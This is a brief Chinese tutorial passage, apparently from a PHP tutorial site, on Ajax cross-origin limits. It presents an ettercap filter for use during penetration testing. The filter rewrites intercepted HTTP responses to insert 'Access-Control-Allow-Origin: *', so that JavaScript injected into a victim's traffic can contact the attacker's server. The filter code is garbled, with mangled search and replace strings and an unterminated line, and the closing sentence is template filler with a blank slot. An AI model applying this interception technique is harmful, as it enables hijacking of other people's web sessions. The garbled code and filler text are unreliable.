Ajax只能訪問(提交表單等)與服務器在同一個域的asp、php等文件,這是因為通常服務器返回的http頭中沒有 Access-Control-Allow-Origin字段。因此,在滲透的過程中,要想讓插入的JS訪問我們自己的伺服器,則需要在http頭中加入此欄位。使用ettercap時,在過濾器中加上:
if(ip.proto == TCP && tcp.src == 80){
if (search(DATA., Cont -類型")){
#msg("access control");
replace("Content-Type","Access-Control-Al rigin:*rnCont
}}
Access-Control-Allow-Origin: *
表示可以接受所有網頁的跨域請求
www.baidu.com以上就介紹了Ajax跨域問題,包括了方面的內容,希望對PHP教程有興趣的朋友有幫助。
